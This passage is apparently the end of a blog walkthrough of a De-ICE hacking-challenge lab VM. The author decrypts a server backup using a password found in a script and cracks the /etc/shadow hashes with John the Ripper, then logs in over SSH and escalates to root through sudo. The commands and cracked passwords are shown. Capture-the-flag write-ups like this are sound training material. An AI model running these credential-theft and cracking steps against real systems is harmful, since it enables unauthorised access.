NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}

root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression

root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root         0 2013-05-13 22:57 etc/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root    125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root       302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root      1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root      3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root      1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root      1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root      1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root         0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root      3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root      4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root       419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root      2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root      2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root      2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root      1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root       728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root       675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root       220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root      3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root       881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root       753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root      6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root       214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root      5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root      7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root      6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root        95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root      1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root      7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root       483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root      1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root       366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root       391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root       335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root       743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root      2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root        65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root      3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl     12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root       724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root        19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root      3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root       848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root       854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root     19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root         0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow    1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root      1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root       726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root       519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root       490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root       509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root        77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root       506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root        87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root      3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root      1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root      1194 2013-01-11 23:42 etc/passwd

root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz

root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley          (rhedley)
mbrown           (mbrown)
mparker          (mparker)
swillard         (swillard)
guesses: 4  time: 0:00:00:00 DONE (Wed Jan  8 11:12:15 2014)  c/s: 50.00  trying: swillard

root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:

root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo   (sraines)
guesses: 1  time: 0:00:36:46 DONE (Wed Jan  8 12:22:24 2014)  c/s: 268  trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User swillard may run the following commands on this host:
    (ALL : ALL) ALL

swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh  secret.jpg
swillard@webhost:/home/mbrown$

That's all.

Some hint from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html

Nincsenek megjegyzések:

Megjegyzés küldése

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.